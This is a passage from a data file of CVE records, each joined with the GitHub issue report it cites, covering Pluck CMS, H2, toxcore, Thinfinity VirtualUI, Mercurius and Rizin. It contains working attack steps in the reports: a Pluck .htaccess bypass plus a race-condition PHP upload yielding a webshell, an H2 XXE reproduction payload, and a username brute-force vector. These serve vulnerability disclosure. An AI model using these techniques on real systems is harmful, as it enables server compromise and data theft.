] | github.com | [
"pluck-cms",
"pluck"
] | I uploaded any file in the "manage files" section, here I uploaded a "1.jpg".

Found two files at the upload folder.

Looked at the source code for the delete file function. On lines 21 and 22 of "data/in/deletefile.php", the logic is that the file ".htaccess" is not allowed to be deleted. But it can be bypassed.

I clicked on the delete button on the page for "1.jpg" and sniffered the packet.

Change the value of the request parameter "var" to ".Htaccess" (the suffix name is not case sensitive in Windows)

".Htaccess" is already in the trash.

The ".htaccess" in the upload folder has been copied to the trash folder.

Looked at the source code for the upload function, lines 34 to 52 of "data/in/file.php".

The code logic is as follows.
1. First check if the file suffix is ".htaccess".
2. then check if the file suffix is in the blacklist.
3. If the suffix is in the blacklist, add the suffix ".txt" for renaming and give permission.
4. If the suffix name is not in the blacklist, then give permission directly.
Use race condition for attacks.
First I create a "phpinfo.php" file.
poc:
<?php phpinfo();?>

Upload the file and sniffer a packet of the upload request and send it to intruder (add variable a=1 to keep sniffering the request packet).

Then sniffer a packet that accesses the file and send it to intruder.

Both intruder types are selected as "Numbers" and the number is 10000.

Threads are set to 20.

Start the attack, when the status of the request to access the file is 200, it means that the file was uploaded successfully and the code was executed.


Upload webshell with race condition and successfully gain access to the server.
exploit:


(Note: the ".php" file only exists when the race condition is in place, if the race condition is stopped the ".php" file will still be a ".php.txt" file, so the shell will disconnect. The shell will then disconnect. (So maintaining permissions requires that race condition be maintained at all times)
From: huanyu@tsign.cn | Pluck-4.7.15 admin background exists a remote command execution vulnerability when uploading files | https://api.github.com/repos/pluck-cms/pluck/issues/98/comments | 11 | 2021-03-03T16:03:21Z | 2022-02-02T07:56:16Z | https://github.com/pluck-cms/pluck/issues/98 | 821,248,159 | 98 | 2,849 |
CVE-2021-31747 | 2021-12-10T19:15:07.827 | Missing SSL Certificate Validation issue exists in Pluck 4.7.15 in update_applet.php, which could lead to man-in-the-middle attacks. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/101"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/101"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*",
"matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"295"
] | 295 | https://github.com/pluck-cms/pluck/issues/101 | [
"Third Party Advisory"
] | github.com | [
"pluck-cms",
"pluck"
] | **Issue Summary**
Pluck's update system deliberately skips SSL certificate validation.
**Detailed Description**
Within update_applet.php is the following code:
```
// Dont check ssl certifical
curl_setopt($geturl, CURLOPT_SSL_VERIFYPEER, false);
```
This ensures peer SSL certificates are never valdiated.
**Impact**
In theory, this vulnerability can make the Pluck's update system susceptible to Man-in-the-middle attacks. | Pluck 4.7.15 - Missing SSL Certificate Validation in update_applet.php | https://api.github.com/repos/pluck-cms/pluck/issues/101/comments | 3 | 2021-04-21T17:59:48Z | 2021-12-26T04:06:21Z | https://github.com/pluck-cms/pluck/issues/101 | 864,135,418 | 101 | 2,850 |
CVE-2021-23463 | 2021-12-10T20:15:07.917 | The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Broken Link"
],
"url": "https://github.com/h2database/h2database/commit/d83285fd2e48fb075780ee95badee6f5a15ea7f8%23diff-008c2e4462609982199cd83e7cf6f1d6b41296b516783f6752c44b9f15dc7bc3"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/h2database/h2database/issues/3195"
},
{
"source": "report@snyk.io",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/h2database/h2database/pull/3199"
},
{
"source": "report@snyk.io",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230818-0010/"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238"
},
{
"source": "report@snyk.io",
"tags": [
"Not Applicable"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/h2database/h2database/commit/d83285fd2e48fb075780ee95badee6f5a15ea7f8%23diff-008c2e4462609982199cd83e7cf6f1d6b41296b516783f6752c44b9f15dc7bc3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/h2database/h2database/issues/3195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/h2database/h2database/pull/3199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230818-0010/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BF697BB1-B848-4C0B-8DFF-EA0DB4F46D13",
"versionEndExcluding": "2.0.202",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.4.198",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"611"
] | 611 | https://github.com/h2database/h2database/issues/3195 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"h2database",
"h2database"
] | **Hello, I am threedr3am of [SecCoder Security Lab](https://www.seccoder.club/) (contact@seccoder.club).**
**We found a security vulnerability(SCSL-2021-1001) in the [H2-Database-Engine jar](https://mvnrepository.com/artifact/com.h2database/h2) when using this component to connect to the h2 database , The returned data content field is parsed through SQLXML, which will cause the client XXE (https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).**
- Oracle mysql jdbc also recently fixed a similar security vulnerability, please refer to: https://nvd.nist.gov/vuln/detail/CVE-2021-2471
- This is their fix commit: https://github.com/mysql/mysql-connector-j/commit/4993d5735fd84a46e7d949ad1bcaa0e9bb039824
### vulnerability detail:
When analyzing the data returned by the database, the org.h2.jdbc.JdbcResultSet class provides the getSQLXML(java.lang.String) method, which parses the string data into an object of the org.h2.jdbc.JdbcSQLXML class.

When the object executes the getSource(Class<T> sourceClass) method, if the input parameter is DOMSource.class, it will result in unprotected parsing of XML, resulting in XXE.

### vulnerability reproduction:
1. The table exists in the database
```
create table tb_test (
id bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键id',
message text COMMENT 'SQLXML',
PRIMARY KEY (`id`)
);
```
2. There is data in the tb_test table
```
insert into tb_test(message) values('<?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY % remote SYSTEM "http://127.0.0.1:80/xxe.dtd"> %remote; ]>');
```
3. Query the database to return the message field and parse it through SQLXML
```
Statement statement = connection.createStatement();
statement.execute("select * from tb_test");
ResultSet resultSet = statement.getResultSet();
while (resultSet.next()) {
SQLXML sqlxml = resultSet.getSQLXML("message");
sqlxml.getSource(DOMSource.class);
}
```
4. result

| Report a H2-Database-Engine SQLXML XXE vulnerability | https://api.github.com/repos/h2database/h2database/issues/3195/comments | 18 | 2021-10-22T07:07:50Z | 2021-12-21T08:07:04Z | https://github.com/h2database/h2database/issues/3195 | 1,033,251,738 | 3,195 | 2,851 |
CVE-2018-25021 | 2021-12-13T01:15:07.533 | The TCP Server module in toxcore before 0.2.8 doesn't free the TCP priority queue under certain conditions, which allows a remote attacker to exhaust the system's memory, causing a denial of service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://blog.tox.chat/2018/10/memory-leak-bug-and-new-toxcore-release-fixing-it/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/issues/1214"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/pull/1216"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://blog.tox.chat/2018/10/memory-leak-bug-and-new-toxcore-release-fixing-it/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/issues/1214"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/pull/1216"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:toktok:toxcore:*:*:*:*:*:*:*:*",
"matchCriteriaId": "41E5F971-61F6-46C9-8E13-EB39CC8C1788",
"versionEndExcluding": "0.2.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"404"
] | 404 | https://github.com/TokTok/c-toxcore/issues/1214 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"TokTok",
"c-toxcore"
] | Happened on 2018-09-25.
Seems like there is a memleak in the code.
```
<LittleVulpix> nurupo: Oh? Let's see...
toxme.io is running so
oh wiw
wow*
[2152112.531883] Out of memory: Kill process 3782 (tox-bootstrapd) score 893 or sacrifice child
[2152112.643896] oom_reaper: reaped process 3782 (tox-bootstrapd), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
If so many went offline at that time I would imagine someone caused a leak to manifest in tox bootstrap daemon took down several nodes with it that way
nurupo: node started but yeah I'm pretty sure this wouldn't have been random. I doubt we all started our nodes exactly at the same time so it must have been someone doing something with the network that caused bootstrap nodes to die
<nurupo> are you sure it was tox-bootstrapd that filled up your ram and not some other program?
<LittleVulpix> nurupo: not minding the fact the same happened to several completely unrelated machines, yeah I'm pretty sure
[2152112.531817] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name
[2152112.531846] [ 3782] 999 3782 467797 455738 903 4 0 0 tox-bootstrapd
467MB ram
reserved
455 actually used
normal resource usage is about 10-15MB RAM from what I remember
soooo that's like 45x as much
<iphy> LittleVulpix: interesting
<nurupo> if there is a memory leak then it's likely to be in toxcore itself so every tox node (i.e. even a client), i don't think there is anything in tox-bootstrapd that can leak memory, so everything that uses toxcore is likely affected, even clients. also, a lot of nodes were using old toxcore, like irungentoo old, so if there is a memory leak issue - it must be long present
<iphy> yes
```

| Massive red shutdown of nodes | https://api.github.com/repos/TokTok/c-toxcore/issues/1214/comments | 2 | 2018-09-28T08:19:22Z | 2018-10-07T22:26:26Z | https://github.com/TokTok/c-toxcore/issues/1214 | 364,787,548 | 1,214 | 2,852 |
CVE-2018-25022 | 2021-12-13T01:15:07.587 | The Onion module in toxcore before 0.2.2 doesn't restrict which packets can be onion-routed, which allows a remote attacker to discover a target user's IP address (when knowing only their Tox Id) by positioning themselves close to target's Tox Id in the DHT for the target to establish an onion connection with the attacker, guessing the target's DHT public key and creating a DHT node with public key close to it, and finally onion-routing a NAT Ping Request to the target, requesting it to ping the just created DHT node. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://blog.tox.chat/2018/04/security-vulnerability-and-new-toxcore-release"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/issues/873"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/pull/872"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://blog.tox.chat/2018/04/security-vulnerability-and-new-toxcore-release"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/issues/873"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/TokTok/c-toxcore/pull/872"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:toktok:toxcore:*:*:*:*:*:*:*:*",
"matchCriteriaId": "26501D21-71F8-447C-9E4F-84528A58C30E",
"versionEndExcluding": "0.2.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"200"
] | 200 | https://github.com/TokTok/c-toxcore/issues/873 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"TokTok",
"c-toxcore"
] | While implementing [tox in rust](https://github.com/tox-rs/tox) we've found vulnerability in onion module.
Currently onion module allows to send any byte sequence through onion path. It can lead to possibility to bypass onion and get IP address (and friends list eventually) knowing only long term public key.
Let's say Alice announces herself to Bob sending AnnounceRequest packet through onion path. After announcement Bob knows Alice's long term public key and onion return addresses to send packets back to Alice. But Bob doesn't know IP address of Alice and want to find it out. All he needs to do is send NAT ping request with his own DHT public key to Alice through onion path using onion return addresses he knows. If Bob is lucky enough to have close DHT public key to Alice's key Alice will redirect this ping request directly to Bob. After receiving his own request Bob will know IP address of Alice.
Now, if somewone want to know somebody's IP address he can generate DHT key close enough to long term public key, wait for announce request, run many DHT nodes and send pings to them one by one.
So I suggest to restrict packet kinds that can be sent through onion path: https://github.com/TokTok/c-toxcore/pull/872
I also monitored tox network through several DHT nodes and didn't notice anything other than onion announce/data packets is sent through onion. So this change shouldn't break anything. | Onion vulnerability | https://api.github.com/repos/TokTok/c-toxcore/issues/873/comments | 5 | 2018-04-15T06:46:40Z | 2022-02-05T01:05:51Z | https://github.com/TokTok/c-toxcore/issues/873 | 314,390,798 | 873 | 2,853 |
CVE-2021-44848 | 2021-12-13T02:15:06.790 | In Cibele Thinfinity VirtualUI before 3.0, /changePassword returns different responses for invalid authentication requests depending on whether the username exists. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165327/Cibele-Thinfinity-VirtualUI-2.5.41.0-User-Enumeration.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cybelesoft/virtualui/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165327/Cibele-Thinfinity-VirtualUI-2.5.41.0-User-Enumeration.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cybelesoft/virtualui/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6EFA7DCD-AADB-4312-BCF9-A02DF4C56569",
"versionEndExcluding": "3.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"203"
] | 203 | https://github.com/cybelesoft/virtualui/issues/1 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cybelesoft",
"virtualui"
] | Dear Cybele Software,
My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed.
I recently found a vulnerability in Thinfinity VirtualUI that allows a malicious actor to enumerate users registered in the OS (Windows) through /changePassword
**How it works**
By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI.
Common users are administrator, admin, guest and krgtbt
**Payload**
The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced.
**Vulnerable versions**
It has been tested in VirtualUI version 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.
| Vulnerability - User Enumeration Unauthenticated | https://api.github.com/repos/cybelesoft/virtualui/issues/1/comments | 1 | 2021-11-29T09:16:36Z | 2021-12-15T17:53:53Z | https://github.com/cybelesoft/virtualui/issues/1 | 1,065,789,900 | 1 | 2,854 |
CVE-2021-43801 | 2021-12-13T20:15:07.577 | Mercurius is a GraphQL adapter for Fastify. Any users from Mercurius@8.10.0 to 8.11.1 are subjected to a denial of service attack by sending a malformed JSON to `/graphql` unless they are using a custom error handler. The vulnerability has been fixed in https://github.com/mercurius-js/mercurius/pull/678 and shipped as v8.11.2. As a workaround users may use a custom error handler. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mercurius-js/mercurius/issues/677"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mercurius-js/mercurius/pull/678/commits/732b2f895312da8deadd7b173dcd2d141d54b223"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mercurius-js/mercurius/security/advisories/GHSA-273r-rm8g-7f3x"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mercurius-js/mercurius/issues/677"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mercurius-js/mercurius/pull/678/commits/732b2f895312da8deadd7b173dcd2d141d54b223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mercurius-js/mercurius/security/advisories/GHSA-273r-rm8g-7f3x"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mercurius_project:mercurius:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "8746C91F-FFCB-4ECD-BE62-EDFF7D9AACC6",
"versionEndExcluding": "8.11.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "8.10.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"754"
] | 754 | https://github.com/mercurius-js/mercurius/issues/677 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"mercurius-js",
"mercurius"
] | In production it's possible to see:
```
TypeError: Cannot read properties of undefined (reading 'reply')
at defaultErrorFormatter (/app/node_modules/mercurius/lib/errors.js:67:19)
at Object.<anonymous> (/app/node_modules/mercurius/lib/routes.js:139:40)
at handleError (/app/node_modules/fastify/lib/reply.js:555:20)
at onErrorHook (/app/node_modules/fastify/lib/reply.js:524:5)
at _Reply.Reply.send (/app/node_modules/fastify/lib/reply.js:128:5)
at done (/app/node_modules/fastify/lib/contentTypeParser.js:167:13)
at Parser.defaultJsonParser [as fn] (/app/node_modules/fastify/lib/contentTypeParser.js:262:14)
at IncomingMessage.onEnd (/app/node_modules/fastify/lib/contentTypeParser.js:243:27)
at AsyncResource.runInAsyncScope (node:async_hooks:199:9)
at IncomingMessage.emit (node:events:402:35)
```
This can happen if an error is thrown in a hook. We should be adding back the check for Context in the error handler.
_Originally posted by @SimenB in https://github.com/mercurius-js/mercurius/pull/653#discussion_r760304267_ | Context can be undefined in the error handler | https://api.github.com/repos/mercurius-js/mercurius/issues/677/comments | 0 | 2021-12-01T16:53:59Z | 2021-12-01T18:34:54Z | https://github.com/mercurius-js/mercurius/issues/677 | 1,068,652,286 | 677 | 2,855 |
CVE-2021-43814 | 2021-12-13T20:15:07.640 | Rizin is a UNIX-like reverse engineering framework and command-line toolset. In versions up to and including 0.3.1 there is a heap-based out of bounds write in parse_die() when reversing an AMD64 ELF binary with DWARF debug info. When a malicious AMD64 ELF binary is opened by a victim user, Rizin may crash or execute unintended actions. No workaround are known and users are advised to upgrade. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.7,
